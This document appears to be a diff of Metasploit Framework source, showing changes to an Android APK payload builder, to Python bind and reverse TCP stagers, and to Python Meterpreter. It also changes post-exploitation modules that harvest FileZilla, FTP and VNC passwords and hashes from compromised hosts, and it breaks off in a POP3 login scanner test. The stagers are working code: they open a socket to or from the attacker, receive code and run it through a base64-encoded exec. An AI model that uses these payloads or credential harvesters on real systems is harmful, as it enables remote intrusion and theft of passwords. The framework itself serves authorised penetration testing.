classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
|
classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
|
||||||
|
|
||||||
string_sub(classes, '127.0.0.1 ', datastore['LHOST'].to_s) if datastore['LHOST']
|
string_sub(classes, 'XXXX127.0.0.1 ', "XXXX" + datastore['LHOST'].to_s) if datastore['LHOST']
|
||||||
string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT']
|
string_sub(classes, 'YYYY4444 ', "YYYY" + datastore['LPORT'].to_s) if datastore['LPORT']
|
||||||
|
string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
|
||||||
jar.add_file("classes.dex", fix_dex_header(classes))
|
jar.add_file("classes.dex", fix_dex_header(classes))
|
||||||
|
|
||||||
files = [
|
files = [
|
||||||
[ "AndroidManifest.xml" ],
|
[ "AndroidManifest.xml" ],
|
||||||
[ "res", "drawable-mdpi", "icon.png" ],
|
|
||||||
[ "res", "layout", "main.xml" ],
|
|
||||||
[ "resources.arsc" ]
|
[ "resources.arsc" ]
|
||||||
]
|
]
|
||||||
|
|
||||||
jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
|
jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
|
||||||
jar.build_manifest
|
jar.build_manifest
|
||||||
|
|
||||||
x509_name = OpenSSL::X509::Name.parse(
|
cert, key = generate_cert
|
||||||
"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
|
|
||||||
)
|
|
||||||
key = OpenSSL::PKey::RSA.new(1024)
|
|
||||||
cert = OpenSSL::X509::Certificate.new
|
|
||||||
cert.version = 2
|
|
||||||
cert.serial = 1
|
|
||||||
cert.subject = x509_name
|
|
||||||
cert.issuer = x509_name
|
|
||||||
cert.public_key = key.public_key
|
|
||||||
|
|
||||||
# Some time within the last 3 years
|
|
||||||
cert.not_before = Time.now - rand(3600*24*365*3)
|
|
||||||
|
|
||||||
# From http://developer.android.com/tools/publishing/app-signing.html
|
|
||||||
# """
|
|
||||||
# A validity period of more than 25 years is recommended.
|
|
||||||
#
|
|
||||||
# If you plan to publish your application(s) on Google Play, note
|
|
||||||
# that a validity period ending after 22 October 2033 is a
|
|
||||||
# requirement. You can not upload an application if it is signed
|
|
||||||
# with a key whose validity expires before that date.
|
|
||||||
# """
|
|
||||||
# The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
|
|
||||||
cert.not_after = Time.at( 0x78045d81 + rand( 0x7fffffff - 0x78045d81 ))
|
|
||||||
|
|
||||||
jar.sign(key, cert, [cert])
|
jar.sign(key, cert, [cert])
|
||||||
|
|
||||||
jar
|
jar
|
||||||
|
|
|
@ -15,36 +15,38 @@ module Metasploit3
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
'Name' => 'Python Bind TCP Stager',
|
'Name' => 'Python Bind TCP Stager',
|
||||||
'Description' => 'Python connect stager',
|
'Description' => 'Listen for a connection',
|
||||||
'Author' => 'Spencer McIntyre',
|
'Author' => 'Spencer McIntyre',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'python',
|
'Platform' => 'python',
|
||||||
'Arch' => ARCH_PYTHON,
|
'Arch' => ARCH_PYTHON,
|
||||||
'Handler' => Msf::Handler::BindTcp,
|
'Handler' => Msf::Handler::BindTcp,
|
||||||
'Stager' => {'Payload' => ""}
|
'Stager' => {'Payload' => ""}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Constructs the payload
|
# Constructs the payload
|
||||||
#
|
#
|
||||||
def generate
|
def generate
|
||||||
cmd = ''
|
|
||||||
# Set up the socket
|
# Set up the socket
|
||||||
cmd += "import socket,struct\n"
|
cmd = "import socket,struct\n"
|
||||||
cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
|
cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
|
||||||
cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
|
cmd << "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
|
||||||
cmd += "s.listen(1)\n"
|
cmd << "s.listen(1)\n"
|
||||||
cmd += "c,a=s.accept()\n"
|
cmd << "c,a=s.accept()\n"
|
||||||
cmd += "l=struct.unpack('>I',c.recv(4))[0]\n"
|
cmd << "l=struct.unpack('>I',c.recv(4))[0]\n"
|
||||||
cmd += "d=c.recv(4096)\n"
|
cmd << "d=c.recv(4096)\n"
|
||||||
cmd += "while len(d)!=l:\n"
|
cmd << "while len(d)!=l:\n"
|
||||||
cmd += "\td+=c.recv(4096)\n"
|
cmd << "\td+=c.recv(4096)\n"
|
||||||
cmd += "exec(d,{'s':c})\n"
|
cmd << "exec(d,{'s':c})\n"
|
||||||
|
|
||||||
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
|
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
|
||||||
cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
|
b64_stub = "import base64,sys;exec(base64.b64decode("
|
||||||
return cmd
|
b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
|
||||||
|
b64_stub << Rex::Text.encode_base64(cmd)
|
||||||
|
b64_stub << "')))"
|
||||||
|
return b64_stub
|
||||||
end
|
end
|
||||||
|
|
||||||
def handle_intermediate_stage(conn, payload)
|
def handle_intermediate_stage(conn, payload)
|
||||||
|
|
|
@ -15,34 +15,36 @@ module Metasploit3
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
'Name' => 'Python Reverse TCP Stager',
|
'Name' => 'Python Reverse TCP Stager',
|
||||||
'Description' => 'Reverse Python connect back stager',
|
'Description' => 'Connect back to the attacker',
|
||||||
'Author' => 'Spencer McIntyre',
|
'Author' => 'Spencer McIntyre',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'python',
|
'Platform' => 'python',
|
||||||
'Arch' => ARCH_PYTHON,
|
'Arch' => ARCH_PYTHON,
|
||||||
'Handler' => Msf::Handler::ReverseTcp,
|
'Handler' => Msf::Handler::ReverseTcp,
|
||||||
'Stager' => {'Payload' => ""}
|
'Stager' => {'Payload' => ""}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Constructs the payload
|
# Constructs the payload
|
||||||
#
|
#
|
||||||
def generate
|
def generate
|
||||||
cmd = ''
|
|
||||||
# Set up the socket
|
# Set up the socket
|
||||||
cmd += "import socket,struct\n"
|
cmd = "import socket,struct\n"
|
||||||
cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
|
cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
|
||||||
cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
|
cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
|
||||||
cmd += "l=struct.unpack('>I',s.recv(4))[0]\n"
|
cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
|
||||||
cmd += "d=s.recv(4096)\n"
|
cmd << "d=s.recv(4096)\n"
|
||||||
cmd += "while len(d)!=l:\n"
|
cmd << "while len(d)!=l:\n"
|
||||||
cmd += "\td+=s.recv(4096)\n"
|
cmd << "\td+=s.recv(4096)\n"
|
||||||
cmd += "exec(d,{'s':s})\n"
|
cmd << "exec(d,{'s':s})\n"
|
||||||
|
|
||||||
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
|
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
|
||||||
cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
|
b64_stub = "import base64,sys;exec(base64.b64decode("
|
||||||
return cmd
|
b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
|
||||||
|
b64_stub << Rex::Text.encode_base64(cmd)
|
||||||
|
b64_stub << "')))"
|
||||||
|
return b64_stub
|
||||||
end
|
end
|
||||||
|
|
||||||
def handle_intermediate_stage(conn, payload)
|
def handle_intermediate_stage(conn, payload)
|
||||||
|
|
|
@ -8,19 +8,25 @@ require 'msf/core/handler/reverse_tcp'
|
||||||
require 'msf/base/sessions/meterpreter_python'
|
require 'msf/base/sessions/meterpreter_python'
|
||||||
require 'msf/base/sessions/meterpreter_options'
|
require 'msf/base/sessions/meterpreter_options'
|
||||||
|
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
include Msf::Sessions::MeterpreterOptions
|
include Msf::Sessions::MeterpreterOptions
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Python Meterpreter',
|
'Name' => 'Python Meterpreter',
|
||||||
'Description' => 'Run a meterpreter server in Python',
|
'Description' => %q{
|
||||||
'Author' => ['Spencer McIntyre'],
|
Run a meterpreter server in Python. Supported Python versions
|
||||||
|
are 2.5 - 2.7 and 3.1 - 3.4.
|
||||||
|
},
|
||||||
|
'Author' => 'Spencer McIntyre',
|
||||||
'Platform' => 'python',
|
'Platform' => 'python',
|
||||||
'Arch' => ARCH_PYTHON,
|
'Arch' => ARCH_PYTHON,
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Session' => Msf::Sessions::Meterpreter_Python_Python))
|
'Session' => Msf::Sessions::Meterpreter_Python_Python
|
||||||
|
))
|
||||||
|
register_advanced_options([
|
||||||
|
OptBool.new('DEBUGGING', [ true, "Enable debugging for the Python meterpreter", false ])
|
||||||
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def generate_stage
|
def generate_stage
|
||||||
|
@ -29,6 +35,11 @@ module Metasploit3
|
||||||
met = File.open(file, "rb") {|f|
|
met = File.open(file, "rb") {|f|
|
||||||
f.read(f.stat.size)
|
f.read(f.stat.size)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if datastore['DEBUGGING']
|
||||||
|
met = met.sub("DEBUGGING = False", "DEBUGGING = True")
|
||||||
|
end
|
||||||
|
|
||||||
met
|
met
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -33,13 +33,7 @@ class Metasploit3 < Msf::Post
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
drive = session.sys.config.getenv('SystemDrive')
|
@progs = "#{session.sys.config.getenv('ProgramFiles')}\\"
|
||||||
case session.platform
|
|
||||||
when /win64/i
|
|
||||||
@progs = drive + '\\Program Files (x86)\\'
|
|
||||||
when /win32/i
|
|
||||||
@progs = drive + '\\Program Files\\'
|
|
||||||
end
|
|
||||||
|
|
||||||
filezilla = check_filezilla
|
filezilla = check_filezilla
|
||||||
if filezilla != nil
|
if filezilla != nil
|
||||||
|
@ -147,20 +141,39 @@ class Metasploit3 < Msf::Post
|
||||||
source_id = nil
|
source_id = nil
|
||||||
end
|
end
|
||||||
|
|
||||||
# report the goods!
|
|
||||||
report_auth_info(
|
service_data = {
|
||||||
:host => session.sock.peerhost,
|
address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
|
||||||
:port => config['ftp_port'],
|
port: config['ftp_port'],
|
||||||
:sname => 'ftp',
|
service_name: 'ftp',
|
||||||
:proto => 'tcp',
|
protocol: 'tcp',
|
||||||
:user => cred['user'],
|
workspace_id: myworkspace_id
|
||||||
:pass => cred['password'],
|
}
|
||||||
:ptype => "MD5 hash",
|
|
||||||
:source_id => source_id,
|
credential_data = {
|
||||||
:source_type => "exploit",
|
origin_type: :session,
|
||||||
:target_host => config['ftp_bindip'],
|
jtr_format: 'raw-md5',
|
||||||
:target_port => config['ftp_port']
|
session_id: session_db_id,
|
||||||
)
|
post_reference_name: self.refname,
|
||||||
|
private_type: :nonreplayable_hash,
|
||||||
|
private_data: cred['password'],
|
||||||
|
username: cred['user']
|
||||||
|
}
|
||||||
|
|
||||||
|
credential_data.merge!(service_data)
|
||||||
|
|
||||||
|
credential_core = create_credential(credential_data)
|
||||||
|
|
||||||
|
# Assemble the options hash for creating the Metasploit::Credential::Login object
|
||||||
|
login_data ={
|
||||||
|
core: credential_core,
|
||||||
|
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||||
|
}
|
||||||
|
|
||||||
|
# Merge in the service data and create our Login
|
||||||
|
login_data.merge!(service_data)
|
||||||
|
login = create_credential_login(login_data)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
perms.each do |perm|
|
perms.each do |perm|
|
||||||
|
@ -190,19 +203,37 @@ class Metasploit3 < Msf::Post
|
||||||
#the module will crash with an error.
|
#the module will crash with an error.
|
||||||
vprint_status("(No admin information found.)")
|
vprint_status("(No admin information found.)")
|
||||||
else
|
else
|
||||||
report_auth_info(
|
service_data = {
|
||||||
:host => session.sock.peerhost,
|
address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
|
||||||
:port => config['admin_port'],
|
port: config['admin_port'],
|
||||||
:sname => 'filezilla-admin',
|
service_name: 'filezilla-admin',
|
||||||
:proto => 'tcp',
|
protocol: 'tcp',
|
||||||
:user => 'admin',
|
workspace_id: myworkspace_id
|
||||||
:pass => config['admin_pass'],
|
}
|
||||||
:type => "password",
|
|
||||||
:source_id => source_id,
|
credential_data = {
|
||||||
:source_type => "exploit",
|
origin_type: :session,
|
||||||
:target_host => config['admin_bindip'],
|
session_id: session_db_id,
|
||||||
:target_port => config['admin_port']
|
post_reference_name: self.refname,
|
||||||
)
|
private_type: :password,
|
||||||
|
private_data: config['admin_pass'],
|
||||||
|
username: 'admin'
|
||||||
|
}
|
||||||
|
|
||||||
|
credential_data.merge!(service_data)
|
||||||
|
|
||||||
|
credential_core = create_credential(credential_data)
|
||||||
|
|
||||||
|
# Assemble the options hash for creating the Metasploit::Credential::Login object
|
||||||
|
login_data ={
|
||||||
|
core: credential_core,
|
||||||
|
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||||
|
}
|
||||||
|
|
||||||
|
# Merge in the service data and create our Login
|
||||||
|
login_data.merge!(service_data)
|
||||||
|
login = create_credential_login(login_data)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv,
|
p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv,
|
||||||
|
|
|
@ -109,14 +109,34 @@ class Metasploit3 < Msf::Post
|
||||||
else
|
else
|
||||||
source_id = nil
|
source_id = nil
|
||||||
end
|
end
|
||||||
report_auth_info(
|
service_data = {
|
||||||
:host => host,
|
address: host,
|
||||||
:port => port,
|
port: port,
|
||||||
:source_id => source_id,
|
service_name: 'ftp',
|
||||||
:source_type => "exploit",
|
protocol: 'tcp',
|
||||||
:user => user,
|
workspace_id: myworkspace_id
|
||||||
:pass => pass
|
}
|
||||||
)
|
|
||||||
|
credential_data = {
|
||||||
|
origin_type: :session,
|
||||||
|
session_id: session_db_id,
|
||||||
|
post_reference_name: self.refname,
|
||||||
|
private_type: :password,
|
||||||
|
private_data: pass,
|
||||||
|
username: user
|
||||||
|
}
|
||||||
|
|
||||||
|
credential_data.merge!(service_data)
|
||||||
|
|
||||||
|
credential_core = create_credential(credential_data)
|
||||||
|
login_data ={
|
||||||
|
core: credential_core,
|
||||||
|
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||||
|
}
|
||||||
|
|
||||||
|
login_data.merge!(service_data)
|
||||||
|
login = create_credential_login(login_data)
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -8,7 +8,7 @@
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'rex'
|
require 'rex'
|
||||||
require 'msf/core/auxiliary/report'
|
require 'msf/core/auxiliary/report'
|
||||||
|
require 'rex/proto/rfb'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
|
@ -224,37 +224,79 @@ class Metasploit3 < Msf::Post
|
||||||
e[:port] = 5900
|
e[:port] = 5900
|
||||||
end
|
end
|
||||||
print_good("#{e[:name]} => #{e[:hash]} => #{e[:pass]} on port: #{e[:port]}")
|
print_good("#{e[:name]} => #{e[:hash]} => #{e[:pass]} on port: #{e[:port]}")
|
||||||
if session.db_record
|
|
||||||
source_id = session.db_record.id
|
service_data = {
|
||||||
else
|
address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
|
||||||
source_id = nil
|
port: e[:port],
|
||||||
end
|
service_name: 'vnc',
|
||||||
report_auth_info(
|
protocol: 'tcp',
|
||||||
:host => session.sock.peerhost,
|
workspace_id: myworkspace_id
|
||||||
:sname => 'vnc',
|
}
|
||||||
:pass => "#{e[:pass]}",
|
|
||||||
:port => "#{e[:port]}",
|
# Assemble data about the credential objects we will be creating
|
||||||
:source_id => source_id,
|
credential_data = {
|
||||||
:source_type => "exploit",
|
origin_type: :session,
|
||||||
:type => 'password'
|
session_id: session_db_id,
|
||||||
)
|
post_reference_name: self.refname,
|
||||||
|
private_type: :password,
|
||||||
|
private_data: "#{e[:pass]}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Merge the service data into the credential data
|
||||||
|
credential_data.merge!(service_data)
|
||||||
|
|
||||||
|
# Create the Metasploit::Credential::Core object
|
||||||
|
credential_core = create_credential(credential_data)
|
||||||
|
|
||||||
|
# Assemble the options hash for creating the Metasploit::Credential::Login object
|
||||||
|
login_data ={
|
||||||
|
access_level: 'interactive',
|
||||||
|
core: credential_core,
|
||||||
|
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||||
|
}
|
||||||
|
|
||||||
|
# Merge in the service data and create our Login
|
||||||
|
login_data.merge!(service_data)
|
||||||
|
login = create_credential_login(login_data)
|
||||||
|
|
||||||
end
|
end
|
||||||
if e[:viewonly_pass] != nil
|
if e[:viewonly_pass] != nil
|
||||||
print_good("VIEW ONLY: #{e[:name]} => #{e[:viewonly_hash]} => #{e[:viewonly_pass]} on port: #{e[:port]}")
|
print_good("VIEW ONLY: #{e[:name]} => #{e[:viewonly_hash]} => #{e[:viewonly_pass]} on port: #{e[:port]}")
|
||||||
if session.db_record
|
|
||||||
source_id = session.db_record.id
|
service_data = {
|
||||||
else
|
address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
|
||||||
source_id = nil
|
port: e[:port],
|
||||||
end
|
service_name: 'vnc',
|
||||||
report_auth_info(
|
protocol: 'tcp',
|
||||||
:host => session.sock.peerhost,
|
workspace_id: myworkspace_id
|
||||||
:sname => 'vnc',
|
}
|
||||||
:viewonly_pass => "#{e[:viewonly_pass]}",
|
|
||||||
:port => "#{e[:port]}",
|
# Assemble data about the credential objects we will be creating
|
||||||
:source_id => source_id,
|
credential_data = {
|
||||||
:source_type => "exploit",
|
origin_type: :session,
|
||||||
:type => 'password_ro'
|
session_id: session_db_id,
|
||||||
)
|
post_reference_name: self.refname,
|
||||||
|
private_type: :password,
|
||||||
|
private_data: "#{e[:viewonly_pass]}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Merge the service data into the credential data
|
||||||
|
credential_data.merge!(service_data)
|
||||||
|
|
||||||
|
# Create the Metasploit::Credential::Core object
|
||||||
|
credential_core = create_credential(credential_data)
|
||||||
|
|
||||||
|
# Assemble the options hash for creating the Metasploit::Credential::Login object
|
||||||
|
login_data ={
|
||||||
|
access_level: 'view_only',
|
||||||
|
core: credential_core,
|
||||||
|
status: Metasploit::Credential::Login::Status::UNTRIED
|
||||||
|
}
|
||||||
|
|
||||||
|
# Merge in the service data and create our Login
|
||||||
|
login_data.merge!(service_data)
|
||||||
|
login = create_credential_login(login_data)
|
||||||
|
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
unload_our_hives(userhives)
|
unload_our_hives(userhives)
|
||||||
|
|
|
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post
|
||||||
'Description' =>
|
'Description' =>
|
||||||
%q{
|
%q{
|
||||||
This module gathers information about the files and file paths that logged on users have
|
This module gathers information about the files and file paths that logged on users have
|
||||||
executed on the system. It also will check if the file exists on the system still. This
|
executed on the system. It also will check if the file still exists on the system. This
|
||||||
information is gathered by using information stored under the MUICache registry key. If
|
information is gathered by using information stored under the MUICache registry key. If
|
||||||
the user is logged in when the module is executed it will collect the MUICache entries
|
the user is logged in when the module is executed it will collect the MUICache entries
|
||||||
by accessing the registry directly. If the user is not logged in the module will download
|
by accessing the registry directly. If the user is not logged in the module will download
|
||||||
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
|
||||||
username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList"
|
username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList"
|
||||||
profile_subkeys = registry_enumkeys(username_reg_path)
|
profile_subkeys = registry_enumkeys(username_reg_path)
|
||||||
if profile_subkeys.blank?
|
if profile_subkeys.blank?
|
||||||
print_error("Unable to access ProfileList registry key. Can't continue.")
|
print_error("Unable to access ProfileList registry key. Unable to continue.")
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post
|
||||||
end
|
end
|
||||||
user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath")
|
user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath")
|
||||||
if user_home_path.blank?
|
if user_home_path.blank?
|
||||||
print_error("Unable to read ProfileImagePath from the registry. Can't continue.")
|
print_error("Unable to read ProfileImagePath from the registry. Unable to continue.")
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
full_path = user_home_path.strip
|
full_path = user_home_path.strip
|
||||||
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Post
|
||||||
# If the registry_enumvals returns us nothing then we'll know
|
# If the registry_enumvals returns us nothing then we'll know
|
||||||
# that the user is most likely not logged in and we'll need to
|
# that the user is most likely not logged in and we'll need to
|
||||||
# download and process users hive locally.
|
# download and process users hive locally.
|
||||||
print_warning("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..")
|
print_warning("User #{user}: Can't access registry. Maybe the user is not logged in? Trying NTUSER.DAT/USRCLASS.DAT...")
|
||||||
result = process_hive(sys_path, user, muicache, hive_file)
|
result = process_hive(sys_path, user, muicache, hive_file)
|
||||||
unless result.nil?
|
unless result.nil?
|
||||||
result.each { |r|
|
result.each { |r|
|
||||||
|
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post
|
||||||
# If the registry_enumvals returns us content we'll know that we
|
# If the registry_enumvals returns us content we'll know that we
|
||||||
# can access the registry directly and thus continue to process
|
# can access the registry directly and thus continue to process
|
||||||
# the content collected from there.
|
# the content collected from there.
|
||||||
print_status("User #{user}: Enumerating registry..")
|
print_status("User #{user}: Enumerating registry...")
|
||||||
subkeys.each do |key|
|
subkeys.each do |key|
|
||||||
if key[0] != "@" && key != "LangID" && !key.nil?
|
if key[0] != "@" && key != "LangID" && !key.nil?
|
||||||
result = check_file_exists(key, user)
|
result = check_file_exists(key, user)
|
||||||
|
@ -142,11 +142,11 @@ class Metasploit3 < Msf::Post
|
||||||
ntuser_status = file_exist?(hive_path)
|
ntuser_status = file_exist?(hive_path)
|
||||||
|
|
||||||
unless ntuser_status == true
|
unless ntuser_status == true
|
||||||
print_warning("Couldn't locate/download #{user}'s registry hive. Can't proceed.")
|
print_warning("Couldn't locate/download #{user}'s registry hive. Unable to proceed.")
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..")
|
print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file...")
|
||||||
local_hive_copy = Rex::Quickfile.new("jtrtmp")
|
local_hive_copy = Rex::Quickfile.new("jtrtmp")
|
||||||
local_hive_copy.close
|
local_hive_copy.close
|
||||||
begin
|
begin
|
||||||
|
@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post
|
||||||
# extracting the contents of the MUICache registry key.
|
# extracting the contents of the MUICache registry key.
|
||||||
def hive_parser(local_hive_copy, muicache, user)
|
def hive_parser(local_hive_copy, muicache, user)
|
||||||
results = []
|
results = []
|
||||||
print_status("Parsing registry content..")
|
print_status("Parsing registry content...")
|
||||||
err_msg = "Error parsing hive. Can't continue."
|
err_msg = "Error parsing hive. Unable to continue."
|
||||||
hive = Rex::Registry::Hive.new(local_hive_copy)
|
hive = Rex::Registry::Hive.new(local_hive_copy)
|
||||||
if hive.nil?
|
if hive.nil?
|
||||||
print_error(err_msg)
|
print_error(err_msg)
|
||||||
|
@ -210,7 +210,7 @@ class Metasploit3 < Msf::Post
|
||||||
# - http://forensicartifacts.com/2010/08/registry-muicache/
|
# - http://forensicartifacts.com/2010/08/registry-muicache/
|
||||||
# - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots
|
# - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots
|
||||||
def run
|
def run
|
||||||
print_status("Starting to enumerate MuiCache registry keys..")
|
print_status("Starting to enumerate MUICache registry keys...")
|
||||||
sys_info = sysinfo['OS']
|
sys_info = sysinfo['OS']
|
||||||
|
|
||||||
if sys_info =~/Windows XP/ && is_admin?
|
if sys_info =~/Windows XP/ && is_admin?
|
||||||
|
@ -219,7 +219,7 @@ class Metasploit3 < Msf::Post
|
||||||
hive_file = "\\NTUSER.DAT"
|
hive_file = "\\NTUSER.DAT"
|
||||||
elsif sys_info =~/Windows 7/ && is_admin?
|
elsif sys_info =~/Windows 7/ && is_admin?
|
||||||
print_good("Remote system supported: #{sys_info}")
|
print_good("Remote system supported: #{sys_info}")
|
||||||
muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache"
|
muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MUICache"
|
||||||
hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat"
|
hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat"
|
||||||
else
|
else
|
||||||
print_error("Unsupported OS or not enough privileges. Unable to continue.")
|
print_error("Unsupported OS or not enough privileges. Unable to continue.")
|
||||||
|
@ -236,7 +236,7 @@ class Metasploit3 < Msf::Post
|
||||||
"File status",
|
"File status",
|
||||||
])
|
])
|
||||||
|
|
||||||
print_status("Phase 1: Searching user names..")
|
print_status("Phase 1: Searching user names...")
|
||||||
sys_users, sys_paths, sys_sids = find_user_names
|
sys_users, sys_paths, sys_sids = find_user_names
|
||||||
|
|
||||||
if sys_users.blank?
|
if sys_users.blank?
|
||||||
|
@ -246,16 +246,16 @@ class Metasploit3 < Msf::Post
|
||||||
print_good("Users found: #{sys_users.join(", ")}")
|
print_good("Users found: #{sys_users.join(", ")}")
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Phase 2: Searching registry hives..")
|
print_status("Phase 2: Searching registry hives...")
|
||||||
muicache_reg_keys = enum_muicache_paths(sys_sids, muicache)
|
muicache_reg_keys = enum_muicache_paths(sys_sids, muicache)
|
||||||
results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
|
results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
|
||||||
|
|
||||||
results.each { |r| table << r }
|
results.each { |r| table << r }
|
||||||
|
|
||||||
print_status("Phase 3: Processing results..")
|
print_status("Phase 3: Processing results...")
|
||||||
loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information")
|
loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information")
|
||||||
print_line("\n" + table.to_s + "\n")
|
print_line("\n" + table.to_s + "\n")
|
||||||
print_status("Results stored in: #{loot}")
|
print_status("Results stored as: #{loot}")
|
||||||
print_status("Execution finished.")
|
print_status("Execution finished.")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
# Assemble the information about the SMB service for this host
|
# Assemble the information about the SMB service for this host
|
||||||
service_data = {
|
service_data = {
|
||||||
address: session.sock.peerhost,
|
address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
|
||||||
port: 445,
|
port: 445,
|
||||||
service_name: 'smb',
|
service_name: 'smb',
|
||||||
protocol: 'tcp',
|
protocol: 'tcp',
|
||||||
|
|
|
@ -0,0 +1,82 @@
|
||||||
|
require 'spec_helper'
|
||||||
|
require 'metasploit/framework/login_scanner/pop3'
|
||||||
|
|
||||||
|
describe Metasploit::Framework::LoginScanner::POP3 do
|
||||||
|
subject(:scanner) { described_class.new }
|
||||||
|
|
||||||
|
it_behaves_like 'Metasploit::Framework::LoginScanner::Base'
|
||||||
|
it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
|
||||||
|
|
||||||
|
context "#attempt_login" do
|
||||||
|
|
||||||
|
let(:pub_blank) do
|
||||||
|
Metasploit::Framework::LoginScanner::Credential.new(
|
||||||
|
paired: true,
|
||||||
|
public: "public",
|
||||||
|
private: ''
|
||||||
|
)
|
||||||
|
end
|
||||||
|
context "Raised Exceptions" do
|
||||||
|
